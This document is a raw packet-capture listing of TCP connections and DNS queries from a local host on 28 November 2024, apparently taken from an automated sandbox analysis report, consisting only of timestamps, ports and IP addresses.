                                                                                                                                                                    Nov 28, 2024 22:44:28.655844927 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:28.662492037 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:28.662519932 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:29.881974936 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:29.882101059 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:29.885999918 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:29.886014938 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:29.886334896 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:29.987925053 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:30.143894911 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:30.187323093 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:30.472032070 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:30.472091913 CET44349725104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:30.472327948 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:30.479597092 CET49725443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:34.795253992 CET4974080192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:34.915236950 CET804974018.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:34.915318012 CET4974080192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:34.924679041 CET4974380192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:34.926409960 CET4974080192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:34.926440954 CET4974080192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:35.044744968 CET804974318.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:35.044826984 CET4974380192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:35.046339035 CET804974018.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:35.046365976 CET804974018.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:35.051719904 CET4974380192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:35.056476116 CET4974380192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:35.171675920 CET804974318.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:35.176398039 CET804974318.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:36.970561028 CET804974018.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:36.970714092 CET804974018.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:36.970917940 CET4974080192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:36.971036911 CET4974080192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:37.090920925 CET804974018.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:37.530086994 CET804974318.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:37.530241013 CET804974318.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:37.530304909 CET4974380192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:37.530421972 CET4974380192.168.2.718.141.10.107
                                                                                                                                                                    Nov 28, 2024 22:44:37.650392056 CET804974318.141.10.107192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:39.516262054 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:39.636225939 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:39.638408899 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:39.638662100 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:39.758534908 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:40.988693953 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:41.034852982 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:41.089533091 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:41.209429979 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:41.524159908 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:41.530265093 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:41.530323982 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:41.530477047 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:41.533736944 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:41.533756018 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:41.628617048 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:44:42.808295965 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:42.808398962 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:42.812777996 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:42.812797070 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:42.813075066 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:42.987967014 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:44.195585012 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:44.243330956 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:44.576497078 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:44.576561928 CET44349759104.21.67.152192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:44.576643944 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:44.579467058 CET49759443192.168.2.7104.21.67.152
                                                                                                                                                                    Nov 28, 2024 22:44:49.888636112 CET4978080192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:49.918632030 CET4978180192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.008855104 CET8049780172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:50.008938074 CET4978080192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.009222031 CET4978080192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.009222031 CET4978080192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.039001942 CET8049781172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:50.039082050 CET4978180192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.042895079 CET4978180192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.042912006 CET4978180192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:50.129205942 CET8049780172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:50.129246950 CET8049780172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:50.162967920 CET8049781172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:50.162985086 CET8049781172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.215723038 CET8049781172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.215946913 CET4978180192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.219634056 CET4978180192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.224041939 CET8049780172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.227117062 CET4978080192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.227117062 CET4978080192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.245526075 CET4978480192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.339782953 CET8049781172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.347071886 CET8049780172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.365659952 CET8049784172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.365928888 CET4978480192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.366703033 CET4978480192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.366833925 CET4978480192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.384057999 CET4978780192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.486620903 CET8049784172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.486757040 CET8049784172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.504376888 CET8049787172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.504467010 CET4978780192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.504663944 CET4978780192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.504663944 CET4978780192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:51.625240088 CET8049787172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:51.625382900 CET8049787172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.581410885 CET8049784172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.583116055 CET4978480192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:52.605729103 CET4978480192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:52.676811934 CET8049787172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.680063963 CET4978780192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:52.680638075 CET4978780192.168.2.7172.234.222.138
                                                                                                                                                                    Nov 28, 2024 22:44:52.725796938 CET8049784172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.800791025 CET8049787172.234.222.138192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.517801046 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.557226896 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.637973070 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.638052940 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.638345003 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.638411999 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.677265882 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.677349091 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.677488089 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.677501917 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:00.758388042 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.758402109 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.797620058 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:00.797631025 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.567760944 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.567872047 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.567949057 CET4980880192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.583169937 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.583508968 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.583698988 CET4980680192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.585833073 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.596152067 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.687891006 CET804980882.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.703558922 CET804980682.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.705718040 CET804985282.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.705800056 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.706005096 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.706033945 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.716325998 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.716401100 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.716563940 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.716583014 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:22.825997114 CET804985282.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.826011896 CET804985282.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.836508989 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:22.836519957 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:26.678930044 CET4985280192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.588466883 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.708458900 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:27.708549976 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.728472948 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.728472948 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:27.848455906 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:27.848474979 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:33.461400032 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:33.461467981 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:45:44.749185085 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:44.749383926 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:44.749478102 CET4985380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:44.869487047 CET804985382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:44.895390034 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.015783072 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:45.015876055 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.016161919 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.016175985 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:45.136301994 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:45.136317015 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:46.524276972 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:46.525032043 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:45:49.646241903 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.646334887 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.646385908 CET4986480192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.648278952 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.768748999 CET804986482.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.770647049 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.770714998 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.770873070 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.770898104 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:45:49.890791893 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:49.890805006 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:06.959023952 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:06.959080935 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:06.960428953 CET4990380192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:06.962188005 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.080486059 CET804990382.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:07.082166910 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:07.082323074 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.082426071 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.082452059 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:07.202343941 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:07.202373028 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:08.473320007 CET4971880192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:46:08.593493938 CET8049718132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:11.740159035 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:11.740219116 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:11.740278006 CET4991180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:11.860217094 CET804991182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.653141975 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.773236990 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.773907900 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.774070978 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.774086952 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:14.894012928 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.894037962 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.902856112 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.902930021 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.902975082 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:16.903345108 CET4992280192.168.2.747.129.31.212
                                                                                                                                                                    Nov 28, 2024 22:46:17.023298979 CET804992247.129.31.212192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:21.536088943 CET4975480192.168.2.7132.226.247.73
                                                                                                                                                                    Nov 28, 2024 22:46:21.656418085 CET8049754132.226.247.73192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:29.037707090 CET804992182.112.184.197192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:29.037792921 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:29.037834883 CET4992180192.168.2.782.112.184.197
                                                                                                                                                                    Nov 28, 2024 22:46:29.158154964 CET804992182.112.184.197192.168.2.7

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Nov 28, 2024 22:44:16.594652891 CET5019153192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:26.092693090 CET6238453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:26.239912033 CET5340453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:26.380198002 CET53534041.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:27.167702913 CET6238453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:28.203473091 CET6238453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:28.516356945 CET5684653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:28.654900074 CET53568461.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:30.199661016 CET6238453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:32.234941959 CET53623841.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:32.234981060 CET53623841.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:32.235016108 CET53623841.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:32.235052109 CET53623841.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:32.236419916 CET5593053192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:33.238420963 CET5593053192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:34.268866062 CET5593053192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:34.579782963 CET53559301.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:34.579807997 CET53559301.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:34.579933882 CET53559301.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:36.973294973 CET5782553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:37.989429951 CET5782553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:39.004811049 CET5782553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:41.022582054 CET5782553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:43.167146921 CET53578251.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:43.167159081 CET53578251.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:43.167171001 CET53578251.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:43.167433977 CET53578251.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:43.178198099 CET5679653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:44.194097996 CET5679653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:45.193293095 CET5679653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:47.206796885 CET5679653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:49.362823963 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.362843037 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.362859964 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.363116980 CET53567961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:49.363971949 CET5325153192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:49.863692999 CET53532511.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.608321905 CET6207353192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:52.840854883 CET53620731.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:52.841706038 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:53.832880974 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:54.848702908 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:56.874648094 CET5485253192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:59.083451986 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.083472967 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.083482981 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.083524942 CET53548521.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.084439039 CET5365453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:59.314755917 CET53536541.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.315699100 CET6202053192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:44:59.540350914 CET53620201.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:44:59.542212963 CET4924553192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:45:00.506107092 CET53492451.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:26.679733992 CET6349953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:45:27.583204985 CET53634991.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:45:44.750461102 CET5463353192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:45:44.888593912 CET53546331.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:11.740989923 CET5224953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:12.738260031 CET5224953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:13.754035950 CET5224953192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:14.648359060 CET53522491.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.648423910 CET53522491.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:14.648435116 CET53522491.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:16.907283068 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:17.910101891 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:18.925837040 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:20.925868034 CET5391853192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:23.140171051 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140188932 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140202045 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140209913 CET53539181.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:23.140904903 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:24.145323992 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:25.162677050 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:27.160124063 CET6529653192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:28.047879934 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:28.047894955 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:28.047904015 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:28.047982931 CET53652961.1.1.1192.168.2.7
                                                                                                                                                                    Nov 28, 2024 22:46:29.038467884 CET5544453192.168.2.71.1.1.1
                                                                                                                                                                    Nov 28, 2024 22:46:29.175770044 CET53554441.1.1.1192.168.2.7
